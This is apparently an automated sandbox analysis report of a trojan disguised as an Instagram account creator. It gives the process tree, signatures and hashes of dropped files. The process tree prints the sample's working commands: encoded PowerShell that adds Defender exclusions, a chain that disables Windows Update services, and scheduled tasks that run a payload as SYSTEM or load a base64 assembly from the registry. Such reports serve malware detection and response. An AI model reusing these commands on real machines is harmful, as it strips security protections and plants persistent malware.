Analysis

  • max time kernel
    139s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    06-12-2022 15:30

General

  • Target

    InstagramAccountCreator.exe

  • Size

    50.2MB

  • MD5

    26f0227e22e82d1bb4b670a57a33f2e4

  • SHA1

    c6ce6febe356e5fcb0edfaf78f1d7f47d73c670e

  • SHA256

    2bbf2e073912caf5e14068311b9fdd384e2e3ba18926e6e970be32968f3f044d

  • SHA512

    b66b1da5cc53307179d6102b053a78103cbadfa949cbdcd8a18dd4507b7422a673eb8e5af4c70ece1e1223005b21f2bbac4d561f66db69193ca28d6a29530401

  • SSDEEP

    786432:nagctlsdx7hxfhCvQhR0+YkqgQkvs2nI+W1/FYtKUi5rum7Xu8+iG9sixXHcf:aJtlsdx7h3Ws0GNI+JKUi5KHxiKsmHc

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 7 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 9 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\InstagramAccountCreator.exe
    "C:\Users\Admin\AppData\Local\Temp\InstagramAccountCreator.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAdAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAYgByACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1956
    • C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe
      "C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      PID:1532
    • C:\Users\Admin\AppData\Roaming\Loader.exe
      "C:\Users\Admin\AppData\Roaming\Loader.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:828
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZQBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAbgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcABzACMAPgA="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:920
      • C:\Users\Admin\AppData\Roaming\Client.exe
        "C:\Users\Admin\AppData\Roaming\Client.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAZABpAGMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcwB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAYgB3AGkAIwA+AA=="
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:952
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:632
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1104
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:520
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1680
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:700
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1264
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1640
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1992
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:912
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1836
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1704
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1612
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1304
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1432
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1852
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1856
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:1728
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1960
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1760
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:580
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:1508
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1356
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:1560
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Visions" /tr "\"C:\Program Files\Vision Applications\Vision.exe\""
                        4⤵
                          PID:1764
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Visions" /tr "\"C:\Program Files\Vision Applications\Vision.exe\""
                            5⤵
                            • Creates scheduled task(s)
                            PID:1620
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Visions"
                          4⤵
                            PID:684
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "Visions"
                              5⤵
                                PID:848
                          • C:\Users\Admin\AppData\Roaming\build.exe
                            "C:\Users\Admin\AppData\Roaming\build.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1804
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp84EA.tmp.bat
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1880
                              • C:\Windows\SysWOW64\chcp.com
                                chcp 65001
                                5⤵
                                  PID:1856
                                • C:\Windows\SysWOW64\taskkill.exe
                                  TaskKill /F /IM 1804
                                  5⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:864
                                • C:\Windows\SysWOW64\timeout.exe
                                  Timeout /T 2 /Nobreak
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:868
                            • C:\Users\Admin\AppData\Roaming\Strike.exe
                              "C:\Users\Admin\AppData\Roaming\Strike.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:604
                            • C:\Users\Admin\AppData\Roaming\Blitz Services.exe
                              "C:\Users\Admin\AppData\Roaming\Blitz Services.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1356
                              • C:\Windows\SysWOW64\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 5 /tn Ovygm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Ovygm\).Spwwgq)).EntryPoint.Invoke($Null,$Null)"
                                4⤵
                                • Creates scheduled task(s)
                                PID:316
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {9B428CC5-6C7C-4E97-AC6B-67AF84AAF1B4} S-1-5-18:NT AUTHORITY\System:Service:
                          1⤵
                          • Loads dropped DLL
                          PID:1524
                          • C:\Program Files\Vision Applications\Vision.exe
                            "C:\Program Files\Vision Applications\Vision.exe"
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            PID:1776
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAZABpAGMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcwB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAYgB3AGkAIwA+AA=="
                              3⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1780

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Program Files\Vision Applications\Vision.exe

                          Filesize

                          4.1MB

                          MD5

                          f10d390a8895f0a1cf5ade031ac1b5e0

                          SHA1

                          55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

                          SHA256

                          b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

                          SHA512

                          a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

                        • C:\Program Files\Vision Applications\Vision.exe

                          Filesize

                          4.1MB

                          MD5

                          f10d390a8895f0a1cf5ade031ac1b5e0

                          SHA1

                          55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

                          SHA256

                          b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

                          SHA512

                          a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

                        • C:\Users\Admin\AppData\Local\Temp\tmp84EA.tmp.bat

                          Filesize

                          57B

                          MD5

                          53364ab2e4f9d4d2479294e8024bcdbd

                          SHA1

                          ee97a06756eec4f9276ac7de1ee74c01933521b4

                          SHA256

                          c2164e07e81d773b9a1053b9bd3c0aa81112493e7aa8e0c260b28f80ed7672d4

                          SHA512

                          f292be80be9c9139f378e0724a8a0ea026339772d7e32d39835eaaf6ff530746bef420500b3e43471adb5ce94dbc5d17dcab30b784a0715fe973a7f2b80a15ce

                        • C:\Users\Admin\AppData\Roaming\Blitz Services.exe

                          Filesize

                          111KB

                          MD5

                          85f5505d0e69f945ce24fb6424256d87

                          SHA1

                          f0add1c0c5d02fc937e189be93930fb0c448bbf7

                          SHA256

                          b72817365f429401432afbdca8157c84a066a7d4ff7605657325b9a0a3c667f2

                          SHA512

                          5484fcfc2ddb92dc38281092a6378c48e980db738f49467fd499b86ff14d97df8c16b4bc1cfb7a57ce54781e3b5e805b274f8afbac0fa6d0a63c6f4cc6a0f00c

                        • C:\Users\Admin\AppData\Roaming\Blitz Services.exe

                          Filesize

                          111KB

                          MD5

                          85f5505d0e69f945ce24fb6424256d87

                          SHA1

                          f0add1c0c5d02fc937e189be93930fb0c448bbf7

                          SHA256

                          b72817365f429401432afbdca8157c84a066a7d4ff7605657325b9a0a3c667f2

                          SHA512

                          5484fcfc2ddb92dc38281092a6378c48e980db738f49467fd499b86ff14d97df8c16b4bc1cfb7a57ce54781e3b5e805b274f8afbac0fa6d0a63c6f4cc6a0f00c

                        • C:\Users\Admin\AppData\Roaming\Client.exe

                          Filesize

                          4.1MB

                          MD5

                          f10d390a8895f0a1cf5ade031ac1b5e0

                          SHA1

                          55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

                          SHA256

                          b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

                          SHA512

                          a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

                        • C:\Users\Admin\AppData\Roaming\Client.exe

                          Filesize

                          4.1MB

                          MD5

                          f10d390a8895f0a1cf5ade031ac1b5e0

                          SHA1

                          55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

                          SHA256

                          b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

                          SHA512

                          a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

                        • C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe

                          Filesize

                          44.1MB

                          MD5

                          8bf798c11748118b07087393c2697fc8

                          SHA1

                          448994eb8e13e31829100c1dfedca20e16bec0e0

                          SHA256

                          d3290c2fb0ba5348a5ad1b17a9ec6e0511d79f59c905450bc039bcf3797a3d89

                          SHA512

                          d0496e10ff5bc2a3368ce517e66d16d03eece92e1d39ff4e07f220d95d049d811294561e72b7828785bf89c0cfab15f28f6c61eaf1f5226574d494074d59483c

                        • C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe

                          Filesize

                          44.1MB

                          MD5

                          8bf798c11748118b07087393c2697fc8

                          SHA1

                          448994eb8e13e31829100c1dfedca20e16bec0e0

                          SHA256

                          d3290c2fb0ba5348a5ad1b17a9ec6e0511d79f59c905450bc039bcf3797a3d89

                          SHA512

                          d0496e10ff5bc2a3368ce517e66d16d03eece92e1d39ff4e07f220d95d049d811294561e72b7828785bf89c0cfab15f28f6c61eaf1f5226574d494074d59483c

                        • C:\Users\Admin\AppData\Roaming\Loader.exe

                          Filesize

                          6.0MB

                          MD5

                          85a0cae06cf6fe7a4dde5658d881a787

                          SHA1

                          b64b42bedb00d723d883b37137dd5443302c5c97

                          SHA256

                          311418cad3d35fa5fa39179252ee4afde41f0f3a91dbc2dbf214c9eb6b2dc6f7

                          SHA512

                          dce9c385868abc9f066d74f5b72d51c7aed9123e972fa01abd66f5b6b56fd4d1618ca3d352be97c94db0309e495e9cd8848da4b179bdbedac81928afe23f2b8b

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                          Filesize

                          7KB

                          MD5

                          6e98a2a22422c9c71471786692c46aca

                          SHA1

                          d5e0daa0a352db55a0df3955a5c522f5a0c8780d

                          SHA256

                          6689e2dfbcc5b5fb72b7f155cb1c59ce78e01f6e3f33ad4fbbf450a95ce05758

                          SHA512

                          7c2c334f28344b57e46ea373e561d8a78069a7023ac92c55e5a5619f3023378db00e60f72d5af16b00f9827a3b5d2fac52a1ef1e4d2b61a44e52039ed63df5d5

                        • C:\Users\Admin\AppData\Roaming\Strike.exe

                          Filesize

                          224KB

                          MD5

                          fa6143b7805667a5ae710b233696e662

                          SHA1

                          eca95b36a2e5ce51d2ac4d15d54f9bee2096e79f

                          SHA256

                          600287396c9325a05c80f5feb44c91f12e8453ace60dccb3599a9c338b2082ed

                          SHA512

                          cce88b0402e959e85a5d5114e25173636dd983d1031cf0f27ce6cb1549f9ebe9ade7a5a21fa09c7d10ad13a1814da10346cf49753a3c78e3d5bfd7feb8630c82

                        • C:\Users\Admin\AppData\Roaming\Strike.exe

                          Filesize

                          224KB

                          MD5

                          fa6143b7805667a5ae710b233696e662

                          SHA1

                          eca95b36a2e5ce51d2ac4d15d54f9bee2096e79f

                          SHA256

                          600287396c9325a05c80f5feb44c91f12e8453ace60dccb3599a9c338b2082ed

                          SHA512

                          cce88b0402e959e85a5d5114e25173636dd983d1031cf0f27ce6cb1549f9ebe9ade7a5a21fa09c7d10ad13a1814da10346cf49753a3c78e3d5bfd7feb8630c82

                        • C:\Users\Admin\AppData\Roaming\build.exe

                          Filesize

                          1.5MB

                          MD5

                          48ccd08c79467acff8cd53f889c481c3

                          SHA1

                          123bfa1980f512e186351cc20f35c7c87df67455

                          SHA256

                          d853dc258931060e328519cc2055ebc124f0a4ee4c88f1b3045f18dc53ba7c16

                          SHA512

                          415265d6a597d1aadef4c79e734c125464c7bf52b28fc58a0a9cab331821cead0d5d0372d21252c6dabfee13b727c84149a8e32e545e5f14b7ff74c786a41b25

                        • C:\Users\Admin\AppData\Roaming\build.exe

                          Filesize

                          1.5MB

                          MD5

                          48ccd08c79467acff8cd53f889c481c3

                          SHA1

                          123bfa1980f512e186351cc20f35c7c87df67455

                          SHA256

                          d853dc258931060e328519cc2055ebc124f0a4ee4c88f1b3045f18dc53ba7c16

                          SHA512

                          415265d6a597d1aadef4c79e734c125464c7bf52b28fc58a0a9cab331821cead0d5d0372d21252c6dabfee13b727c84149a8e32e545e5f14b7ff74c786a41b25

                        • \Program Files\Vision Applications\Vision.exe

                          Filesize

                          4.1MB

                          MD5

                          f10d390a8895f0a1cf5ade031ac1b5e0

                          SHA1

                          55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

                          SHA256

                          b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

                          SHA512

                          a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

                        • \Users\Admin\AppData\Roaming\Blitz Services.exe

                          Filesize

                          111KB

                          MD5

                          85f5505d0e69f945ce24fb6424256d87

                          SHA1

                          f0add1c0c5d02fc937e189be93930fb0c448bbf7

                          SHA256

                          b72817365f429401432afbdca8157c84a066a7d4ff7605657325b9a0a3c667f2

                          SHA512

                          5484fcfc2ddb92dc38281092a6378c48e980db738f49467fd499b86ff14d97df8c16b4bc1cfb7a57ce54781e3b5e805b274f8afbac0fa6d0a63c6f4cc6a0f00c

                        • \Users\Admin\AppData\Roaming\Client.exe

                          Filesize

                          4.1MB

                          MD5

                          f10d390a8895f0a1cf5ade031ac1b5e0

                          SHA1

                          55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

                          SHA256

                          b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

                          SHA512

                          a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

                        • \Users\Admin\AppData\Roaming\InstagramAccountCreator.exe

                          Filesize

                          44.1MB

                          MD5

                          8bf798c11748118b07087393c2697fc8

                          SHA1

                          448994eb8e13e31829100c1dfedca20e16bec0e0

                          SHA256

                          d3290c2fb0ba5348a5ad1b17a9ec6e0511d79f59c905450bc039bcf3797a3d89

                          SHA512

                          d0496e10ff5bc2a3368ce517e66d16d03eece92e1d39ff4e07f220d95d049d811294561e72b7828785bf89c0cfab15f28f6c61eaf1f5226574d494074d59483c

                        • \Users\Admin\AppData\Roaming\Loader.exe

                          Filesize

                          6.0MB

                          MD5

                          85a0cae06cf6fe7a4dde5658d881a787

                          SHA1

                          b64b42bedb00d723d883b37137dd5443302c5c97

                          SHA256

                          311418cad3d35fa5fa39179252ee4afde41f0f3a91dbc2dbf214c9eb6b2dc6f7

                          SHA512

                          dce9c385868abc9f066d74f5b72d51c7aed9123e972fa01abd66f5b6b56fd4d1618ca3d352be97c94db0309e495e9cd8848da4b179bdbedac81928afe23f2b8b

                        • \Users\Admin\AppData\Roaming\Strike.exe

                          Filesize

                          224KB

                          MD5

                          fa6143b7805667a5ae710b233696e662

                          SHA1

                          eca95b36a2e5ce51d2ac4d15d54f9bee2096e79f

                          SHA256

                          600287396c9325a05c80f5feb44c91f12e8453ace60dccb3599a9c338b2082ed

                          SHA512

                          cce88b0402e959e85a5d5114e25173636dd983d1031cf0f27ce6cb1549f9ebe9ade7a5a21fa09c7d10ad13a1814da10346cf49753a3c78e3d5bfd7feb8630c82

                        • \Users\Admin\AppData\Roaming\build.exe

                          Filesize

                          1.5MB

                          MD5

                          48ccd08c79467acff8cd53f889c481c3

                          SHA1

                          123bfa1980f512e186351cc20f35c7c87df67455

                          SHA256

                          d853dc258931060e328519cc2055ebc124f0a4ee4c88f1b3045f18dc53ba7c16

                          SHA512

                          415265d6a597d1aadef4c79e734c125464c7bf52b28fc58a0a9cab331821cead0d5d0372d21252c6dabfee13b727c84149a8e32e545e5f14b7ff74c786a41b25

                        • memory/316-127-0x0000000000000000-mapping.dmp

                        • memory/520-144-0x0000000000000000-mapping.dmp

                        • memory/580-177-0x0000000000000000-mapping.dmp

                        • memory/604-108-0x0000000000BC0000-0x0000000000BFE000-memory.dmp

                          Filesize

                          248KB

                        • memory/604-79-0x0000000000000000-mapping.dmp

                        • memory/604-112-0x0000000004880000-0x00000000048F8000-memory.dmp

                          Filesize

                          480KB

                        • memory/604-117-0x0000000000670000-0x0000000000678000-memory.dmp

                          Filesize

                          32KB

                        • memory/632-142-0x0000000000000000-mapping.dmp

                        • memory/664-118-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp

                          Filesize

                          8KB

                        • memory/664-71-0x0000000000000000-mapping.dmp

                        • memory/664-106-0x000000013F1C0000-0x000000013F5E8000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/684-156-0x0000000000000000-mapping.dmp

                        • memory/700-146-0x0000000000000000-mapping.dmp

                        • memory/828-64-0x0000000000000000-mapping.dmp

                        • memory/848-157-0x0000000000000000-mapping.dmp

                        • memory/864-137-0x0000000000000000-mapping.dmp

                        • memory/868-138-0x0000000000000000-mapping.dmp

                        • memory/912-150-0x0000000000000000-mapping.dmp

                        • memory/920-139-0x00000000736B0000-0x0000000073C5B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/920-67-0x0000000000000000-mapping.dmp

                        • memory/920-122-0x00000000736B0000-0x0000000073C5B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/920-110-0x00000000736B0000-0x0000000073C5B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/952-121-0x000007FEEC3E0000-0x000007FEECE03000-memory.dmp

                          Filesize

                          10.1MB

                        • memory/952-129-0x0000000002864000-0x0000000002867000-memory.dmp

                          Filesize

                          12KB

                        • memory/952-119-0x0000000000000000-mapping.dmp

                        • memory/952-133-0x000000000286B000-0x000000000288A000-memory.dmp

                          Filesize

                          124KB

                        • memory/952-132-0x0000000002864000-0x0000000002867000-memory.dmp

                          Filesize

                          12KB

                        • memory/952-131-0x000000000286B000-0x000000000288A000-memory.dmp

                          Filesize

                          124KB

                        • memory/952-130-0x000000001B710000-0x000000001BA0F000-memory.dmp

                          Filesize

                          3.0MB

                        • memory/952-128-0x000007FEEB880000-0x000007FEEC3DD000-memory.dmp

                          Filesize

                          11.4MB

                        • memory/1104-143-0x0000000000000000-mapping.dmp

                        • memory/1256-54-0x0000000075C61000-0x0000000075C63000-memory.dmp

                          Filesize

                          8KB

                        • memory/1264-147-0x0000000000000000-mapping.dmp

                        • memory/1304-170-0x0000000000000000-mapping.dmp

                        • memory/1340-141-0x0000000000000000-mapping.dmp

                        • memory/1356-124-0x0000000000420000-0x0000000000456000-memory.dmp

                          Filesize

                          216KB

                        • memory/1356-179-0x0000000000000000-mapping.dmp

